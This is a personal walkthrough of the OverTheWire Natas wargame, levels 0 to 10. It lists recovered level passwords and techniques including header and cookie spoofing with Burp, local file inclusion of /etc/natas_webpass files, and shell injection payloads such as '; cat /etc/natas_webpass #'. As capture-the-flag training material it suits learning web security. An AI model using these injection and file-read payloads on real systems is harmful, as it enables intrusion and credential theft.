Natas

1-10 [[https]]://jhalon.github.io/over-the-wire-natas1/

Natas0
Natas0
View Page source

 gtVrDuiDfck831PqWsLEZy5gyDz1clto

Natas1
Press F12
Console

 ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

Natas2
View Page source
Add /files to the end of the current level website address

 sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Natas3
 robots.txt
[[http]]://www.robotstxt.org/
[[http]]://www.robotstxt.org/robotstxt.html

Add /robots.txt to end of current level web address

User-agent: *
Disallow: /s3cr3t/

Add /s3cr3t/ to the end of  current level web address

 Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Natas4
[[Burp]] [[https]]://portswigger.net/[[burp]]
Use [[Burp]] to spoof traffic coming form Natas5
Setup [[Burp]]
 Proxy --> Options
 Proxy listeners -- 127.0.0.1:8080
image

Set firefox proxy manually to  127.0.0.1:8080, SOCKS v5
image

Refresh natas4
Open [[Burp]]
Proxy --> Intercept
Add referer to spoof as Natas5 -- Referer: [[http]]://natas4.natas.labs.overthewire.org/
Click forward
View Natas4 page again

 iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Natas5

Open [[Burp]]
[[Burp]] [[https]]://portswigger.net/[[burp]]
Use [[Burp]] to spoof traffic coming form Natas5
Setup [[Burp]]
 Proxy --> Options
 Proxy listeners -- 127.0.0.1:8080
Set firefox proxy manually to  127.0.0.1:8080, SOCKS v5
Refresh natas4
Open [[Burp]]
Proxy --> Intercept
Change Cookie info at end from loggedin=0 to loggedin=1
Refresh Natas5 page

 aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Natas6

Click View source code
Navigates to [[http]]://natas6.natas.labs.overthewire.org/index-source.html
View PHP between
 includes/secret.inc
Add includes/secret.inc to the end of  current level web address
New page opens --> Inspect page/F12
Secret = FOEIUWGHFEEUHOFUOIU
Use on natas6 homepage

 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Natas7

View souce code
<--  hint: password for webuser natas8 is in /etc/natas_webpass/natas8  -->

Put /etc/natas_webpass/natas8 at end of [[http]]://natas7.natas.labs.overthewire.org/index.php?page=

 DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Natas8

[[Linux]] with php
 php -a
 echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362')));

oubWYf2kBq

Or use cryptii to [[https]]://cryptii.com/ decrypt hex to binary, reverse text , base64 decode

W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Natas9
 shell injection

View source code

Original code
 passthru("grep -i $key dictionary.txt");

Injected code
 ; cat /etc/natas_webpass #

Original and injected code
 grep -i: cat #  dictionary.txt
What's happening
 grep -i:  //  ends the grep  command so we can execute our own command
 cat // returns data from the password file
 # dictionary.txt // # comments out dictionary.txt

 nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

image



Natas10

View source code - search field will not let you use ; | and others

 grep -i -e . /etc/natas_webpass/natas11 #
 -e is for regular expressions

Review regular expressions

 U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK